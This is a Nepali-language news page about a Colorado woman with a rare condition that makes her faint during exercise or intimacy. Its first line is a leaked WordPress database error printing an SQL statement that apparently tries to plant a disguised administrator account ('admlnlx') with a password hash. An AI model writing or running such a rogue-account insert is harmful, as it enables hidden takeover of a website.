WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIX6vMZCJRR7ak2rt1XMocZoNUr8H4.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:33:46', '', 'admlnlx', 'admlnlx')
एजेन्सी,फागुन ३ –
अमेरिकाको क्लोराडामा बस्ने एक महिलालाई एक दुर्लभ किसिमको रोग देखा परेको छ । कैटी बैनना नामकी ३४ वर्षीय महिलालाई व्यायाम गरे वा श्रीमानसंग शारीरिक सम्बन्ध राखेमा मृत्यु हुन सक्ने खालको रोग देखिएको चिकित्सकले जनाएका छन् ।
कैटीले छ वर्षको अवधिमा कयौं डाक्टरहरुलाई भेटेर आफ्नो रोगबारे जानकारी गराएकी छन् । छिटो हिड्नेदेखि लिएर पतिसंग शारीरिक सम्बन्ध बनाउने कार्य गर्दा उनी बेहोस् नै हुने गरेकी छन् । यसै कारण चिकित्सकहरुले पनि उनलाई यस्ता काममा सजग रहन सुझाव दिएको छ ।
व्यायाम गर्न आफूलाई मन पर्ने भएपनि रोगकै कारण डर लाग्ने गरेको उनी बताउँछिन् । वषौंदेखि नर्सिङ पेसामा रहेकी कैटीले कैयौं पटक आफू बेहोस् भएको पाइकी छन् ।
कैटीले आफ्नो यस्तो दुर्लभ रोगको बारेमा २२ वर्षको उमेरमा थाहा पाएकी थिइन् । जुन बेला उनी बेट्स कलेजमा धार्मिक अध्ययन गरिरहेकी थिइन् । मैदानमा आफ्नो साथीहरुसंग दौडिरहेका बेला उनलाई त्यस्तो भएको थियो ।